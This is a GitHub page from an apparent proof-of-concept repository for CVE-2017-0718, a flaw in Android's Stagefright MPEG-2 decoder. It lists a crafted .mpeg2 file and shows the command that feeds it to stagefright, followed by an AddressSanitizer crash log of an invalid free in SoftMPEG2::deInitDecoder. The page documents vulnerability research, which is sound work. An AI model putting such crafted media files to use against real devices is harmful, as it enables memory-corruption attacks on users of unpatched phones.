poc-exp/CVE-2017-0718 at master · ele7enxxh/poc-exp

Name	Name	Last commit message	Last commit date
parent directory ..
CVE-2017-0718.mpeg2	CVE-2017-0718.mpeg2
README.md	README.md
stagefright -s CVE-2017-0718.mpeg2
06-09 02:24:43.176 15793 15793 I         : =================================================================
06-09 02:24:43.176 15793 15793 I         :
06-09 02:24:43.176 15793 15793 I         :
06-09 02:24:43.177 15793 15793 I         : ==15793==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0xef607100 in thread T0
06-09 02:24:43.177 15793 15793 I         :
06-09 02:24:43.177 15793 15793 I         :
06-09 02:24:43.181 16056 16056 I mediacodec: type=1400 audit(0.0:112): avc: denied { execute_no_trans } for path="/system/bin/llvm-symbolizer" dev="dm-0" ino=341 scontext=u:r:mediacodec:s0 tcontext=u:object_r:system_file:s0 tclass=file permissive=1
06-09 02:24:43.214 15793 15793 I         :     #0 0xf3e3e90f in __interceptor_free (/system/lib/libclang_rt.asan-arm-android.so+0x7490f)
06-09 02:24:43.214 15793 15793 I         :
06-09 02:24:43.221 15793 15793 I         :     #1 0xf28223a7 in android::SoftMPEG2::deInitDecoder() /proc/self/cwd/frameworks/av/media/libstagefright/codecs/mpeg2dec/SoftMPEG2.cpp:421:17
06-09 02:24:43.221 15793 15793 I         :
06-09 02:24:43.221 15793 15793 I         :     #2 0xf28223a7 in android::SoftMPEG2::~SoftMPEG2() /proc/self/cwd/frameworks/av/media/libstagefright/codecs/mpeg2dec/SoftMPEG2.cpp:89
06-09 02:24:43.221 15793 15793 I         :
06-09 02:24:43.221 15793 15793 I         :     #3 0xf2822a07 in android::SoftMPEG2::~SoftMPEG2() /proc/self/cwd/frameworks/av/media/libstagefright/codecs/mpeg2dec/SoftMPEG2.cpp:88:25
06-09 02:24:43.221 15793 15793 I         :
06-09 02:24:43.222 15793 15793 I         :     #4 0xf3bfad7b in android::RefBase::decStrong(void const*) const (/system/lib/libutils.so+0xbd7b)
06-09 02:24:43.222 15793 15793 I         :
06-09 02:24:43.224 15793 15793 I         :     #5 0xf42ef473 in android::SoftOMXPlugin::destroyComponentInstance(OMX_COMPONENTTYPE*) (/system/lib/libstagefright_omx.so+0x24473)
06-09 02:24:43.224 15793 15793 I         :
06-09 02:24:43.224 15793 15793 I         :     #6 0xf42e61c9 in android::OMXMaster::destroyComponentInstance(OMX_COMPONENTTYPE*) (/system/lib/libstagefright_omx.so+0x1b1c9)
06-09 02:24:43.224 15793 15793 I         :
06-09 02:24:43.224 15793 15793 I         :     #7 0xf42e6c27 in android::OMXNodeInstance::freeNode(android::OMXMaster*) (/system/lib/libstagefright_omx.so+0x1bc27)
06-09 02:24:43.224 15793 15793 I         :
06-09 02:24:43.224 15793 15793 I         :     #8 0xf42e4bfd in android::OMX::freeNode(unsigned int) (/system/lib/libstagefright_omx.so+0x19bfd)
06-09 02:24:43.224 15793 15793 I         :
06-09 02:24:43.228 15793 15793 I         :     #9 0xf462ea55 in android::BnOMX::onTransact(unsigned int, android::Parcel const&, android::Parcel*, unsigned int) (/system/lib/libmedia.so+0x9ca55)
06-09 02:24:43.228 15793 15793 I         :
06-09 02:24:43.230 15793 15793 I         :     #10 0xf46a49bf in android::BBinder::transact(unsigned int, android::Parcel const&, android::Parcel*, unsigned int) (/system/lib/libbinder.so+0x359bf)
06-09 02:24:43.230 15793 15793 I         :
06-09 02:24:43.231 15793 15793 I         :     #11 0xf46ac19d in android::IPCThreadState::executeCommand(int) (/system/lib/libbinder.so+0x3d19d)
06-09 02:24:43.231 15793 15793 I         :
06-09 02:24:43.231 15793 15793 I         :     #12 0xf46abdf1 in android::IPCThreadState::getAndExecuteCommand() (/system/lib/libbinder.so+0x3cdf1)
06-09 02:24:43.231 15793 15793 I         :
06-09 02:24:43.231 15793 15793 I         :     #13 0xf46ac301 in android::IPCThreadState::joinThreadPool(bool) (/system/lib/libbinder.so+0x3d301)
06-09 02:24:43.231 15793 15793 I         :
06-09 02:24:43.231 15793 15793 I         :     #14 0xb0fb6fcb in __libc_init (/system/bin/mediacodec+0xfcb)
06-09 02:24:43.231 15793 15793 I         :
06-09 02:24:43.235 15793 15793 I         :     #15 0xf3c2ec61 in __libc_init (/system/lib/libc.so+0x16c61)
06-09 02:24:43.235 15793 15793 I         :
06-09 02:24:43.235 15793 15793 I         :
06-09 02:24:43.235 15793 15793 I         :
06-09 02:24:43.235 15793 15793 I         : 0xef607100 is located 2139062384 bytes to the right of 2155905152-byte region [0xef607010,0x6fe0f090)
06-09 02:24:43.235 15793 15793 I         :
06-09 02:24:43.235 15793 15793 I         : ==15793==AddressSanitizer CHECK failed: external/compiler-rt/lib/asan/../sanitizer_common/sanitizer_stackdepotbase.h:142 "((id & (((u32)-1) >> kReservedBits))) == ((id))" (0x808080, 0x80808080)
06-09 02:24:43.235 15793 15793 I         :
06-09 02:24:43.236 15793 15793 I         :     #0 0xf3e49bdb  (/system/lib/libclang_rt.asan-arm-android.so+0x7fbdb)
06-09 02:24:43.236 15793 15793 I         :
06-09 02:24:43.236 15793 15793 I         :     #1 0xf3e4ea47 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/system/lib/libclang_rt.asan-arm-android.so+0x84a47)
06-09 02:24:43.236 15793 15793 I         :
06-09 02:24:43.236 15793 15793 I         :     #2 0xf3e59c7b  (/system/lib/libclang_rt.asan-arm-android.so+0x8fc7b)
06-09 02:24:43.236 15793 15793 I         :
06-09 02:24:43.236 15793 15793 I         :     #3 0xf3e59b6f  (/system/lib/libclang_rt.asan-arm-android.so+0x8fb6f)
06-09 02:24:43.236 15793 15793 I         :
06-09 02:24:43.236 15793 15793 I         :     #4 0xf3de1667 in __cxa_finalize (/system/lib/libclang_rt.asan-arm-android.so+0x17667)
06-09 02:24:43.236 15793 15793 I         :
06-09 02:24:43.236 15793 15793 I         :     #5 0xf3e42ceb  (/system/lib/libclang_rt.asan-arm-android.so+0x78ceb)
06-09 02:24:43.236 15793 15793 I         :
06-09 02:24:43.236 15793 15793 I         :     #6 0xf3e43ee3  (/system/lib/libclang_rt.asan-arm-android.so+0x79ee3)
06-09 02:24:43.236 15793 15793 I         :
06-09 02:24:43.237 15793 15793 I         :     #7 0xf3de27b3 in __cxa_finalize (/system/lib/libclang_rt.asan-arm-android.so+0x187b3)
06-09 02:24:43.237 15793 15793 I         :
06-09 02:24:43.237 15793 15793 I         :     #8 0xf3de261f in __cxa_finalize (/system/lib/libclang_rt.asan-arm-android.so+0x1861f)
06-09 02:24:43.237 15793 15793 I         :
06-09 02:24:43.237 15793 15793 I         :     #9 0xf3e3e9e3 in __interceptor_free (/system/lib/libclang_rt.asan-arm-android.so+0x749e3)
06-09 02:24:43.237 15793 15793 I         :
06-09 02:24:43.237 15793 15793 I         :     #10 0xf28223a7 in android::SoftMPEG2::deInitDecoder() /proc/self/cwd/frameworks/av/media/libstagefright/codecs/mpeg2dec/SoftMPEG2.cpp:421:17
06-09 02:24:43.237 15793 15793 I         :
06-09 02:24:43.237 15793 15793 I         :     #11 0xf28223a7 in android::SoftMPEG2::~SoftMPEG2() /proc/self/cwd/frameworks/av/media/libstagefright/codecs/mpeg2dec/SoftMPEG2.cpp:89
06-09 02:24:43.237 15793 15793 I         :
06-09 02:24:43.237 15793 15793 I         :     #12 0xf2822a07 in android::SoftMPEG2::~SoftMPEG2() /proc/self/cwd/frameworks/av/media/libstagefright/codecs/mpeg2dec/SoftMPEG2.cpp:88:25
06-09 02:24:43.237 15793 15793 I         :
06-09 02:24:43.238 15793 15793 I         :     #13 0xf3bfad7b in android::RefBase::decStrong(void const*) const (/system/lib/libutils.so+0xbd7b)
06-09 02:24:43.238 15793 15793 I         :
06-09 02:24:43.238 15793 15793 I         :     #14 0xf42ef473 in android::SoftOMXPlugin::destroyComponentInstance(OMX_COMPONENTTYPE*) (/system/lib/libstagefright_omx.so+0x24473)
06-09 02:24:43.238 15793 15793 I         :
06-09 02:24:43.238 15793 15793 I         :     #15 0xf42e61c9 in android::OMXMaster::destroyComponentInstance(OMX_COMPONENTTYPE*) (/system/lib/libstagefright_omx.so+0x1b1c9)
06-09 02:24:43.238 15793 15793 I         :
06-09 02:24:43.238 15793 15793 I         :     #16 0xf42e6c27 in android::OMXNodeInstance::freeNode(android::OMXMaster*) (/system/lib/libstagefright_omx.so+0x1bc27)
06-09 02:24:43.238 15793 15793 I         :
06-09 02:24:43.238 15793 15793 I         :     #17 0xf42e4bfd in android::OMX::freeNode(unsigned int) (/system/lib/libstagefright_omx.so+0x19bfd)
06-09 02:24:43.238 15793 15793 I         :
06-09 02:24:43.238 15793 15793 I         :     #18 0xf462ea55 in android::BnOMX::onTransact(unsigned int, android::Parcel const&, android::Parcel*, unsigned int) (/system/lib/libmedia.so+0x9ca55)
06-09 02:24:43.238 15793 15793 I         :
06-09 02:24:43.238 15793 15793 I         :     #19 0xf46a49bf in android::BBinder::transact(unsigned int, android::Parcel const&, android::Parcel*, unsigned int) (/system/lib/libbinder.so+0x359bf)
06-09 02:24:43.238 15793 15793 I         :
06-09 02:24:43.239 15793 15793 I         :     #20 0xf46ac19d in android::IPCThreadState::executeCommand(int) (/system/lib/libbinder.so+0x3d19d)
06-09 02:24:43.239 15793 15793 I         :
06-09 02:24:43.239 15793 15793 I         :     #21 0xf46abdf1 in android::IPCThreadState::getAndExecuteCommand() (/system/lib/libbinder.so+0x3cdf1)
06-09 02:24:43.239 15793 15793 I         :
06-09 02:24:43.239 15793 15793 I         :     #22 0xf46ac301 in android::IPCThreadState::joinThreadPool(bool) (/system/lib/libbinder.so+0x3d301)
06-09 02:24:43.239 15793 15793 I         :
06-09 02:24:43.239 15793 15793 I         :     #23 0xb0fb6fcb in __libc_init (/system/bin/mediacodec+0xfcb)
06-09 02:24:43.239 15793 15793 I         :
06-09 02:24:43.239 15793 15793 I         :     #24 0xf3c2ec61 in __libc_init (/system/lib/libc.so+0x16c61)
Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CVE-2017-0718

CVE-2017-0718

README.md

Files

CVE-2017-0718

Directory actions

More options

Directory actions

More options

Latest commit

History

CVE-2017-0718

Folders and files

parent directory

README.md
